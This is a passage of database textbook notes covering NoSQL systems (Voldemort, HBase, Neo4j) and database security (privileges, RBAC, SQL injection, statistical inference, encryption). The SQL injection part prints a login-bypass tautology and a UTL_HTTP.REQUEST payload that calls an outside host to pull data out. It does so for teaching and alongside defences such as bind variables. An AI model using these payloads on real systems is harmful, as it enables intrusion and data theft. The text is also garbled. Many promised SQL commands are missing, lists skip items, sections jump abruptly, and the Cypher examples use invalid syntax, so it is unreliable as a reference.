the nodes in the distributed cluster of nodes.
• Consistency and versioning: Voldemort uses a method similar to the one developed for
DynamoDB for consistency in the presence of replicas. Basically, concurrent write
operations are allowed by different processes so there could exist two or more different
values associated with the same key at different nodes when items are replicated.
Consistency is achieved when the item is read by using a technique known as versioning
13.10 NOSQL Databases
and read repair. Concurrent writes are allowed, but each write is associated with a vector
clock value. When a read occurs, it is possible that different versions of the same value
(associated with the same key) are read from different nodes. If the system can reconcile
to a single final value, it will pass that value to the read; otherwise, more than one version
can be passed back to the application, which will reconcile the various versions into one
version based on the application semantics and give this reconciled value back to the
nodes.
13.4.3. Examples of Other Key-Value Stores
Oracle key-value store
Oracle has one of the well-known SQL relational database systems, and Oracle also
offers a system based on the key-value store concept; this system is called the Oracle NoSQL
Database.
Redis key-value cache and store
Redis differs from the other systems discussed here because it caches its data in main
memory to further improve performance. It offers master-slave replication and high availability,
and it also offers persistence by backing up the cache to disk.
Apache Cassandra
Cassandra is a NOSQL system that is not easily categorized into one category; it is
sometimes listed in the column-based NOSQL category or in the key-value category. If offers
features from several NOSQL categories and is used by Facebook as well as many other
customers.
13.5. COLUMN BASED SYSTEMS
Another category of NOSQL systems is known as column-based or wide column
systems. The Google distributed storage system for big data, known as BigTable, is a well-
known example of this class of NOSQL systems, and it is used in many Google applications
that require large amounts of data storage, such as Gmail. Big-Table uses the Google File
System (GFS) for data storage and distribution. An open source system known as Apache Hbase
is somewhat similar to Google Big-Table.
BigTable (and Hbase) is sometimes described as a sparse multidimensional distributed
persistent sorted map, where the word map means a collection of (key, value) pairs (the key is
mapped to the value). One of the main differences that distinguish column-based systems from
key-value stores is the nature of the key. In column-based systems such as Hbase, the key is
multidimensional and so has several components: typically, a combination of table name, row
key, column, and timestamp. As we shall see, the column is typically composed of two
components: column family and column qualifier.
Database Management Systems 13.11
Hbase data model. The data model in Hbase organizes data using the concepts of
namespaces, tables, column families, column qualifiers, columns, rows, and data cells. A
column is identified by a combination of (column family:column qualifier). Data is stored in a
self-describing form by associating columns with data values, where data values are strings.
Hbase also stores multiple versions of a data item, with a timestamp associated with each
version, so versions and timestamps are also part of the Hbase data model . As with other
NOSQL systems, unique keys are associated with stored data items for fast access, but the keys
identify cells in the storage system. Because the focus is on high performance when storing
huge amounts of data, the data model includes some storage-related concepts. We discuss the
Hbase data modeling concepts and define the terminology next. It is important to note that the
use of the words table, row, and column is not identical to their use in relational databases, but
the uses are related.
Data in Hbase is stored in tables, and each table has a table name. Data in a table is
stored as self-describing rows. Each row has a unique row key, and row keys are strings
that must have the property that they can be lexicographically ordered, so characters that
do not have a lexicographic order in the character set cannot be used as part of a row
key.
A table is associated with one or more column families. Each column family will have
a name, and the column families associated with a table must be specified when the table
is created and cannot be changed later.
When the data is loaded into a table, each column family can be associated with many
column qualifiers, but the column qualifiers are not specified as part of creating a table.
So the column qualifiers make the model a self-describing data model because the
qualifiers can be dynamically specified as new rows are created and inserted into the
table. A column is specified by a combination of ColumnFamily: ColumnQualifier.
Hbase can keep several versions of a data item, along with the timestamp associated
with each version. The timestamp is a long integer number that represents the system
time when the version was created, so newer versions have larger timestamp values.
Hbase uses midnight ‘January 1, 1970 UTC’ as timestamp value zero, and uses a long
Database Management Systems 13.13
integer that measures the number of milliseconds since that time as the system
timestamp value.
• Cells
A cell holds a basic data item in Hbase. The key (address) of a cell is specified by a
combination of (table, rowid, columnfamily, columnqualifier, timestamp). If timestamp
is left out, the latest version of the item is retrieved unless a default number of versions
is specified, say the latest three versions. The default number of versions to be retrieved,
as well as the default number of versions that the system needs to keep, are parameters
that can be specified during table creation.
• Namespaces
Each Hbase table is divided into a number of regions, where each region will hold a
range of the row keys in the table; this is why the row keys must be lexicographically ordered.
Each region will have a number of stores, where each column family is assigned to one store
within the region. Regions are assigned to region servers (storage nodes) for storage. A master
server (master node) is responsible for monitoring the region servers and for splitting a table
into regions and assigning regions to region servers.
Hbase uses the Apache Zookeeper open source system for services related to managing
the naming, distribution, and synchronization of the Hbase data on the distributed Hbase server
nodes, as well as for coordination and replication services. Hbase also uses Apache HDFS
(Hadoop Distributed File System) for distributed file services. So Hbase is built on top of both
HDFS and Zookeeper.
The data model in Neo4j organizes data using the concepts of nodes and relationships.
Both nodes and relationships can have properties, which store the data items associated with
nodes and relationships. Nodes can have labels; the nodes that have the same label are grouped
into a collection that identifies a subset of the nodes in the database graph for querying purposes.
A node can have zero, one, or several labels. Relationships are directed; each relationship has
a start node and end node as well as a relationship type, which serves a similar role to a node
label by identifying similar relationships that have the same relationship type. Properties can be
specified via a map pattern, which is made of one or more “name : value” pairs enclosed in
curly brackets; for example {Lname : ‘Smith’, Fname : ‘John’, Minit : ‘B’}.
There are various ways in which nodes and relationships can be created; for example,
by calling appropriate Neo4j operations from various Neo4j APIs. We will just show the high-
level syntax for creating nodes and relationships; to do so, we will use the Neo4j CREATE
command, which is part of the high-level declarative query language Cypher. Neo4j has many
options and variations for creating nodes and relationships using various scripting interfaces.
When a node is created, the node label can be specified. It is also possible to create
nodes without any labels.
CREATE (e1: EMPLOYEE, {Empid: ‘1’, Lname: ‘Smith’, Fname: ‘John’, Minit: ‘B’})
CREATE (e2: EMPLOYEE, {Empid: ‘2’, Lname: ‘Wong’, Fname: ‘Franklin’})
CREATE (e3: EMPLOYEE, {Empid: ‘3’, Lname: ‘Zelaya’, Fname: ‘Alicia’})
CREATE (e4: EMPLOYEE, {Empid: ‘4’, Lname: ‘Wallace’, Fname: ‘Jennifer’, Minit: ‘S’})
…
CREATE (d1: DEPARTMENT, {Dno: ‘5’, Dname: ‘Research’})
CREATE (d2: DEPARTMENT, {Dno: ‘4’, Dname: ‘Administration’})
…
CREATE (p1: PROJECT, {Pno: ‘1’, Pname: ‘ProductX’})
CREATE (p2: PROJECT, {Pno: ‘2’, Pname: ‘ProductY’})
CREATE (p3: PROJECT, {Pno: ‘10’, Pname: ‘Computerization’})
CREATE (p4: PROJECT, {Pno: ‘20’, Pname: ‘Reorganization’})
…
CREATE (loc1: LOCATION, {Lname: ‘Houston’})
Database Management Systems 13.15
The → specifies the direction of the relationship, but the relationship can be traversed
in either direction. The relationship types (labels) are WorksFor, Manager, LocatedIn, and
WorksOn; only relationships with the relationship type WorksOn have properties (Hours).
• Paths
A path specifies a traversal of part of the graph. It is typically used as part of a query to
specify a pattern, where the query will retrieve from the graph data that matches the
pattern. A path is typically specified by a start node, followed by one or more
relationships, leading to one or more end nodes that satisfy the pattern.
• Optional Schema
A schema is optional in Neo4j. Graphs can be created and used without a schema, but
in Neo4j version 2.0, a few schema-related functions were added. The main features
related to schema creation involve creating indexes and constraints based on the labels
and properties. For example, it is possible to create the equivalent of a key constraint on
a property of a label, so all nodes in the collection of nodes associated with the label
must have unique values for that property.
When a node is created, the Neo4j system creates an internal unique system-defined
identifier for each node. To retrieve individual nodes using other properties of the nodes
efficiently, the user can create indexes for the collection of nodes that have a particular
label. Typically, one or more of the properties of the nodes in that collection can be
indexed. For example, Empid can be used to index nodes with the EMPLOYEE label,
Dno to index the nodes with the DEPARTMENT label, and Pno to index the nodes with
the PROJECT label.
Neo4j Interfaces and Distributed System Characteristics Neo4j have other interfaces
that can be used to create, retrieve, and update nodes and relationships in a graph
database. It also has two main versions: the enterprise edition, which comes with
additional capabilities, and the community edition. We discuss some of the additional
features of Neo4j in this subsection.
Both editions support the Neo4j graph data model and storage system, as well as the
Cypher graph query language, and several other interfaces, including a high-
performance native API, language drivers for several popular programming languages,
such as Java, Python, PHP, and the REST (Representational State Transfer) API. In
Database Management Systems 13.17
addition, both editions support ACID properties. The enterprise edition supports
additional features for enhancing performance, such as caching and clustering of data
and locking.
• Graph visualization interface
Neo4j has a graph visualization interface, so that a subset of the nodes and edges in a
database graph can be displayed as a graph. This tool can be used to visualize query
results in a graph representation.
• Master-slave replication
Neo4j can be configured on a cluster of distributed system nodes (computers), where
one node is designated the master node. The data and indexes are fully replicated on
each node in the cluster. Various ways of synchronizing the data between master and
slave nodes can be configured in the distributed cluster.
• Caching
A main memory cache can be configured to store the graph data for improved
performance.
• Logical logs
Logs can be maintained to recover from failures. Review Questions 909 A full
discussion of all the features and interfaces of Neo4j is outside the scope of our
presentation. Full documentation of Neo4j is available online.
Neo4j has a high-level query language, Cypher. A Cypher query is made up of clauses.
When a query has several clauses, the result from one clause can be the input to the next clause
in the query. Basic simplified syntax of some common Cypher clauses is listed below:
Database security is a broad area that addresses many issues, including the following:
• Various legal and ethical issues regarding the right to access certain information for
example, some information may be deemed to be private and cannot be accessed legally
by unauthorized organizations or persons
• Policy issues at the governmental, institutional, or corporate level regarding what kinds
of information should not be made publicly available—for example, credit ratings and
personal medical records.
• System-related issues such as the system levels at which various security functions
should be enforced—for example, whether a security function should be handled at the
physical hardware level, the operating system level, or the DBMS level.
• The need in some organizations to identify multiple security levels and to categorize the
data and users based on these classifications—for example, top secret, secret,
confidential, and unclassified.
Threats to databases can result in the loss or degradation of some or all of the following
commonly accepted security goals: integrity, availability, and confidentiality.
1. Account creation: This action creates a new account and password for a user or a group
of users to enable access to the DBMS.
2. Privilege granting: This action permits the DBA to grant certain privileges to certain
accounts.
3. Privilege revocation: This action permits the DBA to revoke (cancel) certain privileges
that were previously given to certain accounts.
4. Security level assignment: This action consists of assigning user accounts to the
appropriate security clearance level.
The DBA is responsible for the overall security of the database system. Action 1 in the
preceding list is used to control access to the DBMS as a whole, whereas actions 2 and 3 are
used to control discretionary database authorization, and action 4 is used to control mandatory
authorization.
To keep a record of all updates applied to the database and of particular users who
applied each update, system log is used. It includes an entry for each operation applied to the
database that may be required for recovery from a transaction failure or system crash. We can
expand the log entries so that they also include the account number of the user and the online
computer or device ID that applied each operation recorded in the log. If any tampering with
the database is suspected, a database audit is performed, which consists of reviewing the log to
examine all accesses and operations applied to the database during a certain time period. When
an illegal or unauthorized operation is found, the DBA can determine the account number used
to perform the operation. Database audits are particularly important for sensitive databases that
are updated by many transactions and users, such as a banking database that can be updated by
thousands of bank tellers. A database log that is used mainly for security purposes serves as an
audit trail.
Sensitivity of data is a measure of the importance assigned to the data by its owner for
the purpose of denoting its need for protection. Some databases contain only sensitive data
whereas other databases may contain no sensitive data at all. Handling databases that fall at
these two extremes is relatively easy because such databases can be covered by access control.
The situation becomes tricky when some of the data is sensitive whereas other data is not.
14.4 Databases Security
Several factors must be considered before deciding whether it is safe to reveal the data.
The three most important factors are data availability, access acceptability, and authenticity
assurance.
1. Data availability: If a user is updating a field, then this field becomes inaccessible and
other users should not be able to view this data. This blocking is only temporary and
only to ensure that no user sees any inaccurate data. This is typically handled by the
concurrency control mechanism.
The term precision, when used in the security area, refers to allowing as much as
possible of the data to be available, subject to protecting exactly the subset of data that is
sensitive. The definitions of security versus precision are as follows:
• Security: Means of ensuring that data is kept safe from corruption and that access to it
is suitably controlled. To provide security means to disclose only nonsensitive data and
to reject any query that references a sensitive field.
• Precision: To protect all sensitive data while disclosing or making available as much
nonsensitive data as possible.
Informally, there are two levels for assigning privileges to use the database system:
• The account level: At this level, the DBA specifies the particular privileges that each
account holds independently of the relations in the database.
Database Management Systems 14.5
• The relation (or table) level: At this level, the DBA can control the privilege to access
each individual relation or view in the database.
The granting and revoking of privileges generally follow an authorization model for
discretionary privileges known as the access matrix model, where the rows of a matrix M
represent subjects (users, accounts, programs) and the columns represent objects (relations,
records, columns, views, operations). Each position M(i, j) in the matrix represents the types of
privileges (read, write, update) that subject i holds on object j.
In SQL, the following types of privileges can be granted on each individual relation R:
• SELECT (retrieval or read) privilege on R: Gives the account retrieval privilege using
the SELECT statement to retrieve tuples from R.
• Modification privileges on R: This gives the account the capability to modify the tuples
of R. In SQL, this includes three privileges: UPDATE, DELETE, and INSERT.
Additionally, both the INSERT and UPDATE privileges can specify that only certain
attributes of R can be modified by the account.
• References privilege on R. This gives the account the capability to reference (or refer
to) a relation R when specifying integrity constraints. This privilege can also be
restricted to specific attributes of R.
In some cases, it is desirable to grant a privilege to a user temporarily. For example, the
owner of a relation may want to grant the SELECT privilege to a user for a specific task and
then revoke that privilege once the task is completed. Hence, a mechanism for revoking
privileges is needed. In SQL, a REVOKE command is included for the purpose of canceling
privileges.
It is possible for a user to receive a certain privilege from two or more sources. For
example, A4 may receive a certain UPDATE R privilege from both A2 and A3. In such a case,
if A2 revokes this privilege from A4, A4 will still continue to have the privilege by virtue of
having been granted it from A3. If A3 later revokes the privilege from A4, A4 totally loses the
privilege. Hence, a DBMS that allows propagation of privileges must keep track of how all the
privileges were granted in the form of some internal log so that revoking of privileges can be
done correctly and completely.
Suppose that the DBA creates four accounts—A1, A2, A3, and A4—and wants only A1
to be able to create base relations. To do this, the DBA must issue the following GRANT
command in SQL:
The CREATETAB (create table) privilege gives account A1 the capability to create new
database tables (base relations) and is hence an account privilege. Note that A1, A2, and so
forth may be individuals, like John in IT department or Mary in marketing; but they may also
be applications or programs that want to access a database.
In SQL2, the same effect can be accomplished by having the DBA issue a CREATE
SCHEMA command, as follows:
User account A1 can now create tables under the schema called EXAMPLE. To
continue our example, suppose that A1 creates the two base relations EMPLOYEE and
DEPARTMENT, A1 is then the owner of these two relations and hence has all the relation
privileges on each of them.
Next, suppose that account A1 wants to grant to account A2 the privilege to insert and
delete tuples in both of these relations. However, A1 does not want A2 to be able to propagate
these privileges to additional accounts. A1 can issue the following command:
The owner account A1 of a relation automatically has the GRANT OPTION, allowing
it to grant privileges on the relation to other accounts. However, account A2 cannot grant
INSERT and DELETE privileges on the EMPLOYEE and DEPARTMENT tables because A2
was not given the GRANT OPTION in the preceding command.
Database Management Systems 14.7
Next, suppose that A1 wants to allow account A3 to retrieve information from either of
the two tables and also to be able to propagate the SELECT privilege to other accounts. A1 can
issue the following command:
The clause WITH GRANT OPTION means that A3 can now propagate the privilege to
other accounts by using GRANT. For example, A3 can grant the SELECT privilege on the
EMPLOYEE relation to A4 by issuing the following command:
Now suppose that A1 decides to revoke the SELECT privilege on the EMPLOYEE
relation from A3; A1 then can issue this command:
The DBMS must now revoke the SELECT privilege on EMPLOYEE from A3, and it
must also automatically revoke the SELECT privilege on EMPLOYEE from A4. This is
because A3 granted that privilege to A4, but A3 does not have the privilege any more.
Next, suppose that A1 wants to give back to A3 a limited capability to SELECT from
the EMPLOYEE relation and wants to allow A3 to be able to propagate the privilege. The
limitation is to retrieve only the Name, Bdate, and Address attributes and only for the tuples
with Dno = 5. A1 then can create the following view:
FROM EMPLOYEE
WHERE Dno = 5;
After the view is created, A1 can grant SELECT on the view A3EMPLOYEE to A3 as follows:
The UPDATE and INSERT privileges can specify particular attributes that may be
updated or inserted in a relation. Finally, suppose that A1 wants to allow A4 to update only the
Salary attribute of EMPLOYEE; A1 can then issue the following command:
Role-based access control (RBAC) has emerged as a proven technology for managing
and enforcing security in large-scale enterprise-wide systems. Its basic notion is that privileges
and other permissions are associated with organizational roles rather than with individual users.
Individual users are then assigned to appropriate roles. Roles can be created using the CREATE
ROLE and DESTROY ROLE commands. The GRANT and REVOKE can then be used to
assign and revoke privileges from roles, as well as for individual users when needed. For
example, a company may have roles such as sales account manager, purchasing agent, mailroom
clerk, customer service manager, and so on. Multiple individuals can be assigned to each role.
Security privileges that are common to a role are granted to the role name, and any individual
assigned to this role would automatically have those privileges granted.
RBAC can be used with traditional access controls; it ensures that only authorized users
in their specified roles are given access to certain data or resources.
Each session can be assigned to several roles, but it maps to one user or a single subject
only. Many DBMSs have allowed the concept of roles, where privileges can be assigned to
roles.
Two roles are said to be mutually exclusive if both the roles cannot be used
simultaneously by the user. Mutual exclusion of roles can be categorized into two types, namely
authorization time exclusion (static) and runtime exclusion (dynamic). In authorization time
exclusion, two roles that have been specified as mutually exclusive cannot be part of a user’s
authorization at the same time. In runtime exclusion, both these roles can be authorized to one
user but cannot be activated by the user at the same time. Another variation in mutual exclusion
of roles is that of complete and partial exclusion.
The role hierarchy in RBAC is a natural way to organize roles to reflect the
organization’s lines of authority and responsibility. By convention, junior roles at the bottom
are connected to progressively senior roles as one move up the hierarchy. The hierarchic
Database Management Systems 14.9
diagrams are partial orders, so they are reflexive, transitive, and antisymmetric. In other words,
if a user has one role, the user automatically has roles lower in the hierarchy. Defining a role
hierarchy involves choosing the type of hierarchy and the roles, and then implementing the
hierarchy by granting roles to other roles. Role hierarchy can be implemented in the following
manner:
In an SQL injection attack, the attacker injects a string input through the application,
which changes or manipulates the SQL statement to the attacker’s advantage. An SQL injection
attack can harm the database in various ways, such as unauthorized manipulation of the database
or retrieval of sensitive data. It can also be used to execute system-level commands that may
cause the system to deny service to the application.
SQL Manipulation:
A manipulation attack, which is the most common type of injection attack, changes an
SQL command in the application—for example, by adding conditions to the WHERE-clause of
a query, or by expanding a query with additional query components using set operations such
as UNION, INTERSECT, or MINUS. Other types of manipulation attacks are also possible.
For example, suppose that a simplistic authentication procedure issues the following query and
checks to see if any rows were returned:
The attacker can try to change (or manipulate) the SQL statement by changing it as follows:
SELECT * FROM users WHERE username = ‘jake’ and (PASSWORD =‘jakespasswd’ or ‘x’
= ‘x’);
As a result, the attacker who knows that ‘jake’ is a valid login of some user is able to
log into the database system as ‘jake’ without knowing his password and is able to do everything
that ‘jake’ may be authorized to do to the database system.
Code Injection:
This type of attack attempts to add additional SQL statements or commands to the
existing SQL statement by exploiting a computer bug, which is caused by processing invalid
data. The attacker can inject or introduce code into a computer program to change the course of
execution. Code injection is a popular technique for system hacking or cracking to gain
information.
In this kind of attack, a database function or operating system function call is inserted
into a vulnerable SQL statement to manipulate the data or make a privileged system call. For
example, it is possible to exploit a function that performs some aspect related to network
communication. In addition, functions that are contained in a customized database package, or
any custom database function, can be executed as part of an SQL query. For example, the dual
Database Management Systems 14.11
table is used in the FROM clause of SQL in Oracle when a user needs to run SQL that does not
logically have a table name. To get today’s date, we can use:
The following example demonstrates that even the simplest SQL statements can be
vulnerable.
This type of SQL statement can be subjected to a function injection attack. Consider the
following example:
SELECT TRANSLATE (“ || UTL_HTTP.REQUEST(‘http://129.107.2.1/’) || ”,‘98765432’,
‘9876’) FROM dual;
The user can input the string (“ || UTL_HTTP.REQUEST (‘http://129.107.2.1/’) ||”),
where || is the concatenate operator, thus requesting a page from a Web server. UTL_HTTP
makes Hypertext Transfer Protocol (HTTP) callouts from SQL. The REQUEST object takes a
URL (‘http://129.107.2.1/’ in this example) as a parameter, contacts that site, and returns the
data (typically HTML) obtained from that site. The attacker could manipulate the string he
inputs, as well as the URL, to include other functions and do other illegal operations. We just
used a dummy example to show conversion of ‘98765432’ to ‘9876’, but the user’s intent would
be to access the URL and get sensitive information. The attacker can then retrieve useful
information from the database server—located at the URL that is passed as a parameter—and
send it to the Web server.
14.4.2. Risks Associated with SQL Injection
SQL injection is harmful and the risks associated with it provide motivation for
attackers. Some of the risks associated with SQL injection attacks are:
• Database fingerprinting: The attacker can determine the type of database being used in
the backend so that he can use database-specific attacks that correspond to weaknesses
in a particular DBMS.
• Denial of service: The attacker can flood the server with requests, thus denying service
to valid users, or the attacker can delete some data.
14.12 Databases Security
• Bypassing authentication: This is one of the most common risks, in which the attacker
can gain access to the database as an authorized user and perform all the desired tasks.
• Identifying injectable parameters: In this type of attack, the attacker gathers important
information about the type and structure of the back-end database of a Web application.
This attack is made possible by the fact that the default error page returned by
application servers is often overly descriptive.
• Executing remote commands: This provides attackers with a tool to execute arbitrary
commands on the database. For example, a remote user can execute stored database
procedures and functions from a remote SQL interactive interface.
• Performing privilege escalation: This type of attack takes advantage of logical flaws
within the database to upgrade the access level.
14.4.3. Protection Techniques against SQL Injection
Protection against SQL injection attacks can be achieved by applying certain
programming rules to all Web-accessible procedures and functions. This section describes some
of these techniques.
Bind Variables (Using Parameterized Statements): The use of bind variables protects against
injection attacks and also improves performance.
Consider the following example using Java and JDBC:
PreparedStatement stmt = conn.prepareStatement( “SELECT * FROM
EMPLOYEE WHERE EMPLOYEE_ID=? AND PASSWORD=?”);
stmt.setString(1, employee_id);
stmt.setString(2, password);
Instead of embedding the user input into the statement, the input should be bound to a
parameter. In this example, the input ‘1’ is assigned (bound) to a bind variable ‘employee_id’
and input ‘2’ to the bind variable ‘password’ instead of directly passing string parameters.
Filtering Input (Input Validation):
This technique can be used to remove escape characters from input strings by using the
SQL Replace function. For example, the delimiter single quote (‘) can be replaced by two single
quotes (‘’).
Function Security:
Database functions, both standard and custom, should be restricted, as they can be
exploited in the SQL function injection attacks.
Database Management Systems 14.13
Statistical databases are used mainly to produce statistics about various populations. The
database may contain confidential data about individuals; this information should be protected
from user access. However, users are permitted to retrieve statistical information about the
populations, such as averages, sums, counts, maximums, minimums, and standard deviations.
Example: Let us consider PERSON relation with the attributes Name, Ssn, Income, Address,
City, State, Zip, Sex, and Last_degree for illustrating statistical database security.
A population is a set of tuples of a relation (table) that satisfy some selection condition.
Hence, each selection condition on the PERSON relation will specify a particular population of
PERSON tuples. For example, the condition Sex = ‘M’ specifies the male population; the
condition ((Sex = ‘F’) AND (Last_degree = ‘M.S.’ OR Last_degree = ‘Ph.D.’)) specifies the
female population that has an M.S. or Ph.D. degree as their highest degree; and the condition
City = ‘Houston’ specifies the population that lives in Houston.
However, statistical users are not allowed to retrieve individual data, such as the income
of a specific person. Statistical database security techniques must prohibit the retrieval of
individual data. This can be achieved by prohibiting queries that retrieve attribute values and
by allowing only queries that involve statistical aggregate functions such as COUNT, SUM,
MIN, MAX, AVERAGE, and STANDARD DEVIATION. Such queries are sometimes called
statistical queries.
In some cases, it is possible to infer the values of individual tuples from a sequence of
statistical queries. This is particularly true when the conditions result in a population consisting
of a small number of tuples. As an illustration, consider the following statistical queries:
Now suppose that we are interested in finding the Salary of Jane Smith, and we know
that she has a Ph.D. degree and that she lives in the city of Bellaire, Texas. We issue the
statistical query Q1 with the following condition:
If we get a result of 1 for this query, we can issue Q2 with the same condition and find
the Salary of Jane Smith. Even if the result of Q1 on the preceding condition is not 1 but is a
small number—say 2 or 3—we can issue statistical queries using the functions MAX, MIN,
and AVERAGE to identify the possible range of values for the Salary of Jane Smith.
• Another technique is partitioning of the database. Partitioning implies that records are
stored in groups of some minimum size; queries can refer to any complete group or set
of groups, but never to subsets of records within a group.
Flow control regulates the distribution or flow of information among accessible objects.
A flow between object X and object Y occurs when a program reads values from X and writes
values into Y. Flow controls check that information contained in some objects does not flow
explicitly or implicitly into less protected objects. Thus, a user cannot get indirectly in Y what
he or she cannot get directly in X. Most flow controls employ some concept of security class;
the transfer of information from a sender to a receiver is allowed only if the receiver’s security
class is at least as privileged as the sender’s security class. Example: Preventing a service
program from leaking a customer’s confidential data, and blocking the transmission of secret
military data to an unknown classified user.
A flow policy specifies the channels along which information is allowed to move. The
simplest flow policy specifies just two classes of information—confidential (C) and
nonconfidential (N)—and allows all flows except those from class C to class N. This policy can
solve the confinement problem that arises when a service program handles data such as
customer information, some of which may be confidential. For example, an income-tax-
computing service might be allowed to retain a customer’s address and the bill for services
rendered, but not a customer’s income or deductions.
Database Management Systems 14.15
Two types of flow can be distinguished: explicit flows, which occur as a consequence
of assignment instructions, such as Y:= f(X1,Xn,); and implicit flows, which are generated by
conditional instructions, such as if f(Xm+1, … , Xn) then Y:= f (X1,Xm).
Encryption is the conversion of data into a form, called a ciphertext that cannot be easily
understood by unauthorized persons. It enhances security and privacy when access controls are
bypassed, because in cases of data loss or theft, encrypted data cannot be easily understood by
unauthorized persons. Some of the standard definitions are listed below:
• Plaintext (or cleartext): Intelligible data that has meaning and can be read or acted
upon without the application of decryption
A symmetric key is one key that is used for both encryption and decryption. By using a
symmetric key, fast encryption and decryption is possible for routine use with sensitive data in
the database. A message encrypted with a secret key can be decrypted only with the same secret
key. Algorithms used for symmetric key encryption are called secret key algorithms. Since
secret-key algorithms are mostly used for encrypting the content of a message, they are also
called content-encryption algorithms.
Public key algorithms are based on mathematical functions rather than operations on bit
patterns. They address one drawback of symmetric key encryption, namely that both sender and
recipient must exchange the common key in a secure manner. In public key systems, two keys
are used for encryption/decryption. The public key can be transmitted in a nonsecure way,
whereas the private key is not transmitted at all. These algorithms—which use two related keys,
a public key and a private key, to perform complementary operations (encryption and
decryption)—are known as asymmetric key encryption algorithms. The two keys used for
public key encryption are referred to as the public key and the private key. The private key is
14.16 Databases Security
kept secret, but it is referred to as a private key rather than a secret key (the key used in
conventional encryption) to avoid confusion with conventional encryption.
1. Plaintext. This is the data or readable message that is fed into the algorithm as input.
3. Public and private keys. These are a pair of keys that have been selected so that if one
is used for encryption, the other is used for decryption. The exact transformations
performed by the encryption algorithm depend on the public or private key that is
provided as input. For example, if a message is encrypted using the public key, it can
only be decrypted using the private key.
5. Decryption algorithm. This algorithm accepts the ciphertext and the matching key and
produces the original plaintext.
1. Each user generates a pair of keys to be used for the encryption and decryption of
messages.
2. Each user places one of the two keys in a public register or other accessible file. This is
the public key. The companion key is kept private.
3. If a sender wishes to send a private message to a receiver, the sender encrypts the
message using the receiver’s public key.
4. When the receiver receives the message, he or she decrypts it using the receiver’s private
key. No other recipient can decrypt the message because only the receiver knows his or
her private key.
Considering the vast growth in volume and speed of threats to databases and information
assets, research efforts need to be devoted to a number of issues: data quality, intellectual
property rights, and database survivability.
Database Management Systems 14.17
Data Quality:
The database community needs techniques and organizational solutions to assess and
attest to the quality of data. These techniques may include simple mechanisms such as quality
stamps that are posted on Web sites. We also need techniques that provide more effective
integrity semantics verification and tools for the assessment of data quality, based on techniques
such as record linkage. Application-level recovery techniques are also needed for automatically
repairing incorrect data.
Intellectual Property Rights:
With the widespread use of the Internet and intranets, legal and informational aspects of
data are becoming major concerns for organizations. To address these concerns, watermarking
techniques for relational data have been proposed. Digital watermarking has traditionally relied
upon the availability of a large noise domain within which the object can be altered while
retaining its essential properties. However, research is needed to assess the robustness of such
techniques and to investigate different approaches aimed at preventing intellectual property
rights violations
Database Survivability:
Database systems need to operate and continue their functions, even with reduced
capabilities, despite disruptive events such as information warfare attacks. A DBMS, in addition
to making every effort to prevent an attack and detecting one in the event of occurrence, should
be able to do the following:
• Confinement: Take immediate action to eliminate the attacker’s access to the system
and to isolate or contain the problem to prevent further spread.
• Damage assessment: Determine the extent of the problem, including failed functions
and corrupted data.
• Reconfiguration: Reconfigure to allow operation to continue in a degraded mode while
recovery proceeds.
• Repair: Recover corrupted or lost data and repair or reinstall failed system functions to
reestablish a normal level of operation.
• Fault treatment: To the extent possible, identify the weaknesses exploited in the attack
and take steps to prevent a recurrence.
The specific target of an attack may be the system itself or its data. Although attacks
that bring the system down outright are severe and dramatic, they must also be well timed to
achieve the attacker’s goal, since attacks will receive immediate and concentrated attention in
order to bring the system back to operational condition, diagnose how the attack took place, and
install preventive measures.